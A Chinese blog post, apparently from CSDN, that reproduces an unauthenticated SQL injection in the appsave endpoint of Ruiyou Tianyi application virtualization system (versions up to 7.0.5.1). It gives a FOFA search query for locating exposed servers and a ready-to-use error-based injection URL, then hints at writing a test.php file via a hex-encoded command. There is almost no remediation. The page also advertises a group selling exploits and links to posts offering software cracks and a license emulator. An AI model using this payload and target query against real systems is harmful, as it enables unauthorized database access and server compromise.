瑞友天翼应用虚拟化系统appsave SQL注入漏洞

最新推荐文章于 2024-05-18 16:59:05 发布
最新推荐文章于 2024-05-18 16:59:05 发布
阅读量324 收藏 2
点赞数 7
文章标签: 网络安全 windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mashiro_hibiki/article/details/138679688
版权

网络测绘

fofa:title=="瑞友应用虚拟化系统"

漏洞描述

瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。

瑞友天翼应用虚拟化系统中的/Home/Controller/AdminController 存在 appsave接口无需鉴权并且存在SQL注入。

影响版本

version<=7.0.5.1

漏洞复现

使用burp suite抓包构造POC

/index.php?s=/Admin/appsave&appid=3')+AND+(SELECT+2590+FROM(SELECT+COUNT(*),CONCAT(0x716a766a71,(SELECT+(ELT(2590=2590,1))),0x7162786271,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)--+ITBH

将命令进行hex编码执行

访问test.php

 

加入我们的星球,我们能提供:

1对1就业指导、面试模拟、Golang工具开发学习、Fofo高级会员、各公众号历史文章合集、各种网络安全电子书、面试题合集、最新poc、exp、最常用工具推荐、开放交流环境,解决成员问题。

CatalyzeSec
关注
  • 7
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
漏洞复现】瑞友天翼应用虚拟化系统 appsave SQL注入漏洞
qq_67810151的博客
05-09 246
瑞友天翼应用虚拟化系统 appsave接口存在SQL注入漏洞,未授权的攻击者可以通过该漏洞执行任意sql语句。
瑞友天翼应用虚拟化系统SQL注入致远程代码执行漏洞复现
0xSec
05-07 832
瑞友天翼应用虚拟化系统中的 \Home\Controller\AdminController 存在 appsave/appdel 两个无需鉴权并且存在SQL注入的风险的接口,攻击者可利用 php PDO默认支持堆叠的方式使用堆叠写入恶意文件导致 RCE。
瑞友天翼应用虚拟化系统SQL注入漏洞
一个努力学习网安的小牛马
05-09 455
瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过 WEB 即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。瑞友天翼应用虚拟化系统中的 /Home/Controller/AdminController 存在 appsave/appdel 两个无需鉴权并且存在SQL注入的风险的接口,攻击者可利用 php PDO默认支持堆叠的方式使用堆叠写入恶意文件导致 RCE。
瑞友天翼应用虚拟化系统SQL注入漏洞复现
The current road is different, love needs to distinguish between right and wrong
05-15 18
瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算(Server-based Computing)架构的应用虚拟化平台。其hmrao.php接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用攻击者可以利用SQL注入漏洞执行命令,进而控制服务器系统。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
瑞友天翼应用虚拟化系统 appdel 和appsave SQL注入(含批量验证poc)
weixin_43567873的博客
05-11 52
瑞友天翼应用虚拟化系统 appdel 和appsave SQL注入(含批量验证poc)
瑞友天翼应用虚拟化系统RCE漏洞复现+利用
热门推荐
0xSec
04-18 1万+
瑞友天翼应用虚拟化系统存在远程代码执行漏洞,未经身份认证的远程攻击者可以利用该漏洞在目标系统上执行任意代码,(该漏洞是通过SQL注入写入后门文件进行代码执行)。
漏洞复现】瑞友应用虚拟化系统 SQL注入
失心少年
08-29 647
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!瑞友天翼应用虚拟化系统(GWT System)是国内具有自主知识产权的应用虚拟化平台,是基于服务器计算(Server-based Computing)的应用虚拟化平台。
瑞友天翼应用虚拟化系统(GWT)V6.0服务器端和谐补丁
06-29
瑞友天翼应用虚拟化系统(GWT)V6.0服务器端和谐补丁
瑞友天翼应用虚拟化系统6.0软注册配置工具
07-31
瑞友天翼应用虚拟化系统6.0软注册配置工具
瑞友天翼应用虚拟化系统(GWT)V7.0服务器端和谐补丁
06-29
瑞友天翼应用虚拟化系统(GWT)V7.0服务器端和谐补丁
瑞友天翼应用虚拟化系统6.0
07-31
瑞友天翼应用虚拟化系统6.0
瑞友天翼应用虚拟化系统6.0license模拟器
07-31
瑞友天翼应用虚拟化系统6.0license模拟器
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8236
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
初阶数据结构之双向链表详解
最新发布
2302_80837091的博客
05-18 1073
双向链表也叫双链表,是链表的一种,它的每个数据结点中都有两个指针,分别指向直接后继和直接前驱。所以,从双向链表中的任意一个结点开始,都可以很方便地访问它的前驱结点和后继结点。一般我们都构造双向循环链表,因此,本节的双向链表也是双向循环链表。在List.h中定义链表结点,data的类型设为DataType,方便以后使用其他类型的数据。}ListNode;
如何用java做一个模拟登录画面
2301_78863827的博客
05-17 1007
根据框架我们可以给出具体代码了,可能不是很好,望各位大佬指点
数据结构(Java实现):ArrayList
li_wj6的博客
05-17 714
ArrayList的介绍
服务器没有图形界面没有显示器怎么办
Yonggie的博客
05-14 400
有L P R三种模式。本地端口转发(ssh -L)意味着是SSH客户端(本机,windows)开始侦听新端口。远程端口转发(ssh -R)意味着是sshd服务器开始侦听额外的端口。或者换个写法。
瑞友天翼应用虚拟化系统(gwt)v6.0服务器端和谐补丁
06-15
瑞友天翼应用虚拟化系统(GWT)是一款企业级云计算解决方案,可实现应用程序的虚拟化、集中管理和访问,提高工作效率和资源利用率。但出于某些原因,GWT服务器可能会出现一些不兼容或漏洞的情况,导致系统故障或安全风险。为了解决这些问题,瑞友天翼发布了GWT v6.0服务器端和谐补丁。 这个补丁主要作用是修复GWT服务器端的安全漏洞和兼容性问题,并对系统进行优化,提升性能和稳定性。通过添加补丁,用户可保证系统的稳定性和安全性,避免数据泄露或系统崩溃对企业造成影响。 该补丁的安装需要严格按照瑞友天翼发布的安装指南进行操作,以保证补丁的有效性和稳定性。用户在安装前需备份系统数据和配置文件,以防补丁安装出现异常,影响系统运行。 总之,瑞友天翼应用虚拟化系统(GWT)服务器端和谐补丁的发布是为了解决系统安全和兼容性问题,并提高系统性能和稳定性,用户可根据需要自行选择安装。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值